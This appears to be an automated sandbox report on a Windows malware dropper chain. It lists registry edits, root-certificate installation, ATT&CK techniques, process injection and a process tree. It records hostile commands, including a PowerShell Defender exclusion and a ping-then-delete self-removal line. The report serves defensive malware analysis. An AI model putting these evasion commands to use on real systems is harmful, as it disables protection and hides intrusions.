Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)"	9YnX9TIPmfCMcUr7DOBqr4ym.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	9YnX9TIPmfCMcUr7DOBqr4ym.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

BOWXpT9EMatm7T8qv30PJ1Fe.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4	BOWXpT9EMatm7T8qv30PJ1Fe.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	BOWXpT9EMatm7T8qv30PJ1Fe.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	BOWXpT9EMatm7T8qv30PJ1Fe.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

5172 PING.EXE

pid	process
5172	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exeexplorgu.exepowershell.exepowershell.exepowershell.exeRegAsm.exerundll32.exedialer.exeu2tc.0.exepowershell.exeMWqP5e651UE727D9aFjdApYi.exe9YnX9TIPmfCMcUr7DOBqr4ym.exeYqnYErQDqyvWk0WfwDMsdpx4.exepowershell.exepowershell.exe9YnX9TIPmfCMcUr7DOBqr4ym.exeYqnYErQDqyvWk0WfwDMsdpx4.exe

pid	process
1884	09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exe
1884	09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exe
904	explorgu.exe
904	explorgu.exe
3844	powershell.exe
3844	powershell.exe
132	powershell.exe
4876	powershell.exe
652	RegAsm.exe
652	RegAsm.exe
4332	rundll32.exe
4332	rundll32.exe
4332	rundll32.exe
4332	rundll32.exe
4332	rundll32.exe
4332	rundll32.exe
1532	dialer.exe
1532	dialer.exe
1532	dialer.exe
1532	dialer.exe
4876	powershell.exe
4876	powershell.exe
132	powershell.exe
132	powershell.exe
2736	u2tc.0.exe
2736	u2tc.0.exe
4332	rundll32.exe
4332	rundll32.exe
4332	rundll32.exe
4332	rundll32.exe
1016	powershell.exe
1016	powershell.exe
1016	powershell.exe
3272	MWqP5e651UE727D9aFjdApYi.exe
3272	MWqP5e651UE727D9aFjdApYi.exe
1936	9YnX9TIPmfCMcUr7DOBqr4ym.exe
1936	9YnX9TIPmfCMcUr7DOBqr4ym.exe
3356	YqnYErQDqyvWk0WfwDMsdpx4.exe
3356	YqnYErQDqyvWk0WfwDMsdpx4.exe
780	powershell.exe
780	powershell.exe
4820	powershell.exe
4820	powershell.exe
780	powershell.exe
4820	powershell.exe
3880	9YnX9TIPmfCMcUr7DOBqr4ym.exe
3880	9YnX9TIPmfCMcUr7DOBqr4ym.exe
2800	YqnYErQDqyvWk0WfwDMsdpx4.exe
2800	YqnYErQDqyvWk0WfwDMsdpx4.exe
3880	9YnX9TIPmfCMcUr7DOBqr4ym.exe
3880	9YnX9TIPmfCMcUr7DOBqr4ym.exe
2800	YqnYErQDqyvWk0WfwDMsdpx4.exe
2800	YqnYErQDqyvWk0WfwDMsdpx4.exe
3880	9YnX9TIPmfCMcUr7DOBqr4ym.exe
3880	9YnX9TIPmfCMcUr7DOBqr4ym.exe
3880	9YnX9TIPmfCMcUr7DOBqr4ym.exe
3880	9YnX9TIPmfCMcUr7DOBqr4ym.exe
3880	9YnX9TIPmfCMcUr7DOBqr4ym.exe
3880	9YnX9TIPmfCMcUr7DOBqr4ym.exe
2800	YqnYErQDqyvWk0WfwDMsdpx4.exe
2800	YqnYErQDqyvWk0WfwDMsdpx4.exe
2800	YqnYErQDqyvWk0WfwDMsdpx4.exe
2800	YqnYErQDqyvWk0WfwDMsdpx4.exe
2800	YqnYErQDqyvWk0WfwDMsdpx4.exe

Suspicious use of AdjustPrivilegeToken 33 IoCs

Processes:

powershell.exeinstallutil.exepowershell.exepowershell.exepowershell.exe9YnX9TIPmfCMcUr7DOBqr4ym.exeYqnYErQDqyvWk0WfwDMsdpx4.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeBLHU0RlzPVoO4o5n4SRKk03P.exe9Z26EcBsLLBcqwnDFb4WtGQK.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exepowershell.exepowershell.exepowershell.execsrss.exepowershell.EXE

description	pid	process
Token: SeDebugPrivilege	3844	powershell.exe
Token: SeDebugPrivilege	720	installutil.exe
Token: SeDebugPrivilege	4876	powershell.exe
Token: SeDebugPrivilege	132	powershell.exe
Token: SeDebugPrivilege	1016	powershell.exe
Token: SeDebugPrivilege	1936	9YnX9TIPmfCMcUr7DOBqr4ym.exe
Token: SeDebugPrivilege	3356	YqnYErQDqyvWk0WfwDMsdpx4.exe
Token: SeImpersonatePrivilege	1936	9YnX9TIPmfCMcUr7DOBqr4ym.exe
Token: SeImpersonatePrivilege	3356	YqnYErQDqyvWk0WfwDMsdpx4.exe
Token: SeDebugPrivilege	780	powershell.exe
Token: SeDebugPrivilege	4820	powershell.exe
Token: SeDebugPrivilege	2780	powershell.exe
Token: SeDebugPrivilege	4152	powershell.exe
Token: SeDebugPrivilege	404	powershell.exe
Token: SeDebugPrivilege	2768	powershell.exe
Token: SeDebugPrivilege	5280	powershell.exe
Token: SeDebugPrivilege	5720	powershell.exe
Token: SeDebugPrivilege	4952	BLHU0RlzPVoO4o5n4SRKk03P.exe
Token: SeImpersonatePrivilege	4952	BLHU0RlzPVoO4o5n4SRKk03P.exe
Token: SeDebugPrivilege	3168	9Z26EcBsLLBcqwnDFb4WtGQK.exe
Token: SeImpersonatePrivilege	3168	9Z26EcBsLLBcqwnDFb4WtGQK.exe
Token: SeDebugPrivilege	1260	powershell.exe
Token: SeDebugPrivilege	5296	powershell.exe
Token: SeDebugPrivilege	1092	powershell.exe
Token: SeDebugPrivilege	2808	powershell.exe
Token: SeDebugPrivilege	4540	powershell.exe
Token: SeDebugPrivilege	5820	powershell.exe
Token: SeDebugPrivilege	1260	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
Token: SeDebugPrivilege	2556	powershell.exe
Token: SeDebugPrivilege	6124	powershell.exe
Token: SeDebugPrivilege	5720	powershell.exe
Token: SeSystemEnvironmentPrivilege	5560	csrss.exe
Token: SeDebugPrivilege	880	powershell.EXE

Suspicious use of FindShellTrayWindow 7 IoCs

Processes:

u2tc.1.exe

pid process

5060 u2tc.1.exe
5060 u2tc.1.exe
5060 u2tc.1.exe
5060 u2tc.1.exe
5060 u2tc.1.exe
5060 u2tc.1.exe
5060 u2tc.1.exe
Suspicious use of SendNotifyMessage 7 IoCs

Processes:

u2tc.1.exe

pid process

5060 u2tc.1.exe
5060 u2tc.1.exe
5060 u2tc.1.exe
5060 u2tc.1.exe
5060 u2tc.1.exe
5060 u2tc.1.exe
5060 u2tc.1.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

BroomSetup.exe

pid process

2688 BroomSetup.exe

pid	process
5060	u2tc.1.exe
5060	u2tc.1.exe
5060	u2tc.1.exe
5060	u2tc.1.exe
5060	u2tc.1.exe
5060	u2tc.1.exe
5060	u2tc.1.exe

pid	process
5060	u2tc.1.exe
5060	u2tc.1.exe
5060	u2tc.1.exe
5060	u2tc.1.exe
5060	u2tc.1.exe
5060	u2tc.1.exe
5060	u2tc.1.exe

pid	process
2688	BroomSetup.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

explorgu.exefile300un.exeinstallutil.exePlu2Yra1DcZOYdQ6S0X9boNc.exePlu2Yra1DcZOYdQ6S0X9boNc.tmpRDOdP6RHoxxbbJZvBW0nzcZC.exeq9ftR3MnZJS329eRcXixlt8T.exe9YnX9TIPmfCMcUr7DOBqr4ym.exeYqnYErQDqyvWk0WfwDMsdpx4.exeRegAsm.exe

description	pid	process	target process
PID 904 wrote to memory of 4720	904	explorgu.exe	file300un.exe
PID 904 wrote to memory of 4720	904	explorgu.exe	file300un.exe
PID 4720 wrote to memory of 3844	4720	file300un.exe	powershell.exe
PID 4720 wrote to memory of 3844	4720	file300un.exe	powershell.exe
PID 4720 wrote to memory of 720	4720	file300un.exe	installutil.exe
PID 4720 wrote to memory of 720	4720	file300un.exe	installutil.exe
PID 4720 wrote to memory of 720	4720	file300un.exe	installutil.exe
PID 4720 wrote to memory of 720	4720	file300un.exe	installutil.exe
PID 4720 wrote to memory of 720	4720	file300un.exe	installutil.exe
PID 4720 wrote to memory of 720	4720	file300un.exe	installutil.exe
PID 4720 wrote to memory of 720	4720	file300un.exe	installutil.exe
PID 4720 wrote to memory of 720	4720	file300un.exe	installutil.exe
PID 720 wrote to memory of 3648	720	installutil.exe	q9ftR3MnZJS329eRcXixlt8T.exe
PID 720 wrote to memory of 3648	720	installutil.exe	q9ftR3MnZJS329eRcXixlt8T.exe
PID 720 wrote to memory of 3648	720	installutil.exe	q9ftR3MnZJS329eRcXixlt8T.exe
PID 720 wrote to memory of 3324	720	installutil.exe	Plu2Yra1DcZOYdQ6S0X9boNc.exe
PID 720 wrote to memory of 3324	720	installutil.exe	Plu2Yra1DcZOYdQ6S0X9boNc.exe
PID 720 wrote to memory of 3324	720	installutil.exe	Plu2Yra1DcZOYdQ6S0X9boNc.exe
PID 3324 wrote to memory of 3256	3324	Plu2Yra1DcZOYdQ6S0X9boNc.exe	Plu2Yra1DcZOYdQ6S0X9boNc.tmp
PID 3324 wrote to memory of 3256	3324	Plu2Yra1DcZOYdQ6S0X9boNc.exe	Plu2Yra1DcZOYdQ6S0X9boNc.tmp
PID 3324 wrote to memory of 3256	3324	Plu2Yra1DcZOYdQ6S0X9boNc.exe	Plu2Yra1DcZOYdQ6S0X9boNc.tmp
PID 3256 wrote to memory of 1556	3256	Plu2Yra1DcZOYdQ6S0X9boNc.tmp	seniorflashdecompiler.exe
PID 3256 wrote to memory of 1556	3256	Plu2Yra1DcZOYdQ6S0X9boNc.tmp	seniorflashdecompiler.exe
PID 3256 wrote to memory of 1556	3256	Plu2Yra1DcZOYdQ6S0X9boNc.tmp	seniorflashdecompiler.exe
PID 3256 wrote to memory of 3976	3256	Plu2Yra1DcZOYdQ6S0X9boNc.tmp	seniorflashdecompiler.exe
PID 3256 wrote to memory of 3976	3256	Plu2Yra1DcZOYdQ6S0X9boNc.tmp	seniorflashdecompiler.exe
PID 3256 wrote to memory of 3976	3256	Plu2Yra1DcZOYdQ6S0X9boNc.tmp	seniorflashdecompiler.exe
PID 720 wrote to memory of 1844	720	installutil.exe	RDOdP6RHoxxbbJZvBW0nzcZC.exe
PID 720 wrote to memory of 1844	720	installutil.exe	RDOdP6RHoxxbbJZvBW0nzcZC.exe
PID 720 wrote to memory of 1844	720	installutil.exe	RDOdP6RHoxxbbJZvBW0nzcZC.exe
PID 1844 wrote to memory of 652	1844	RDOdP6RHoxxbbJZvBW0nzcZC.exe	RegAsm.exe
PID 1844 wrote to memory of 652	1844	RDOdP6RHoxxbbJZvBW0nzcZC.exe	RegAsm.exe
PID 1844 wrote to memory of 652	1844	RDOdP6RHoxxbbJZvBW0nzcZC.exe	RegAsm.exe
PID 1844 wrote to memory of 652	1844	RDOdP6RHoxxbbJZvBW0nzcZC.exe	RegAsm.exe
PID 1844 wrote to memory of 652	1844	RDOdP6RHoxxbbJZvBW0nzcZC.exe	RegAsm.exe
PID 1844 wrote to memory of 652	1844	RDOdP6RHoxxbbJZvBW0nzcZC.exe	RegAsm.exe
PID 1844 wrote to memory of 652	1844	RDOdP6RHoxxbbJZvBW0nzcZC.exe	RegAsm.exe
PID 1844 wrote to memory of 652	1844	RDOdP6RHoxxbbJZvBW0nzcZC.exe	RegAsm.exe
PID 1844 wrote to memory of 652	1844	RDOdP6RHoxxbbJZvBW0nzcZC.exe	RegAsm.exe
PID 1844 wrote to memory of 652	1844	RDOdP6RHoxxbbJZvBW0nzcZC.exe	RegAsm.exe
PID 1844 wrote to memory of 652	1844	RDOdP6RHoxxbbJZvBW0nzcZC.exe	RegAsm.exe
PID 720 wrote to memory of 1936	720	installutil.exe	9YnX9TIPmfCMcUr7DOBqr4ym.exe
PID 720 wrote to memory of 1936	720	installutil.exe	9YnX9TIPmfCMcUr7DOBqr4ym.exe
PID 720 wrote to memory of 1936	720	installutil.exe	9YnX9TIPmfCMcUr7DOBqr4ym.exe
PID 720 wrote to memory of 3356	720	installutil.exe	YqnYErQDqyvWk0WfwDMsdpx4.exe
PID 720 wrote to memory of 3356	720	installutil.exe	YqnYErQDqyvWk0WfwDMsdpx4.exe
PID 720 wrote to memory of 3356	720	installutil.exe	YqnYErQDqyvWk0WfwDMsdpx4.exe
PID 3648 wrote to memory of 2736	3648	q9ftR3MnZJS329eRcXixlt8T.exe	u2tc.0.exe
PID 3648 wrote to memory of 2736	3648	q9ftR3MnZJS329eRcXixlt8T.exe	u2tc.0.exe
PID 3648 wrote to memory of 2736	3648	q9ftR3MnZJS329eRcXixlt8T.exe	u2tc.0.exe
PID 1936 wrote to memory of 132	1936	9YnX9TIPmfCMcUr7DOBqr4ym.exe	powershell.exe
PID 1936 wrote to memory of 132	1936	9YnX9TIPmfCMcUr7DOBqr4ym.exe	powershell.exe
PID 1936 wrote to memory of 132	1936	9YnX9TIPmfCMcUr7DOBqr4ym.exe	powershell.exe
PID 3356 wrote to memory of 4876	3356	YqnYErQDqyvWk0WfwDMsdpx4.exe	powershell.exe
PID 3356 wrote to memory of 4876	3356	YqnYErQDqyvWk0WfwDMsdpx4.exe	powershell.exe
PID 3356 wrote to memory of 4876	3356	YqnYErQDqyvWk0WfwDMsdpx4.exe	powershell.exe
PID 652 wrote to memory of 1532	652	RegAsm.exe	dialer.exe
PID 652 wrote to memory of 1532	652	RegAsm.exe	dialer.exe
PID 652 wrote to memory of 1532	652	RegAsm.exe	dialer.exe
PID 652 wrote to memory of 1532	652	RegAsm.exe	dialer.exe
PID 652 wrote to memory of 1532	652	RegAsm.exe	dialer.exe
PID 904 wrote to memory of 4048	904	explorgu.exe	rundll32.exe
PID 904 wrote to memory of 4048	904	explorgu.exe	rundll32.exe
PID 904 wrote to memory of 4048	904	explorgu.exe	rundll32.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2832
- C:\Windows\SysWOW64\dialer.exe
  "C:\Windows\system32\dialer.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1532

C:\Users\Admin\AppData\Local\Temp\09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exe
"C:\Users\Admin\AppData\Local\Temp\09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:1884

C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:904
- C:\Users\Admin\AppData\Local\Temp\1001000001\file300un.exe
  "C:\Users\Admin\AppData\Local\Temp\1001000001\file300un.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4720
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3844
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
    3⤵
    - Drops startup file
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:720
  - - C:\Users\Admin\Pictures\q9ftR3MnZJS329eRcXixlt8T.exe
      "C:\Users\Admin\Pictures\q9ftR3MnZJS329eRcXixlt8T.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3648
    - - C:\Users\Admin\AppData\Local\Temp\u2tc.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u2tc.0.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:2736
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\ECGDHDHJEB.exe"
        6⤵
        
        PID:1104
        
        C:\Users\Admin\AppData\Local\Temp\ECGDHDHJEB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ECGDHDHJEB.exe"
        7⤵
        
        PID:6120
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\ECGDHDHJEB.exe
        8⤵
        
        PID:5420
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 2.2.2.2 -n 1 -w 3000
        9⤵
        Runs ping.exe
        
        PID:5172
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 2848
        6⤵
        Program crash
        
        PID:4876
    - - C:\Users\Admin\AppData\Local\Temp\u2tc.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u2tc.1.exe"
        5⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5060
      - C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1260
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 1168
        5⤵
        Program crash
        
        PID:5040
  - - C:\Users\Admin\Pictures\Plu2Yra1DcZOYdQ6S0X9boNc.exe
      "C:\Users\Admin\Pictures\Plu2Yra1DcZOYdQ6S0X9boNc.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3324
    - - C:\Users\Admin\AppData\Local\Temp\is-J1LL2.tmp\Plu2Yra1DcZOYdQ6S0X9boNc.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-J1LL2.tmp\Plu2Yra1DcZOYdQ6S0X9boNc.tmp" /SL5="$80178,1402811,54272,C:\Users\Admin\Pictures\Plu2Yra1DcZOYdQ6S0X9boNc.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:3256
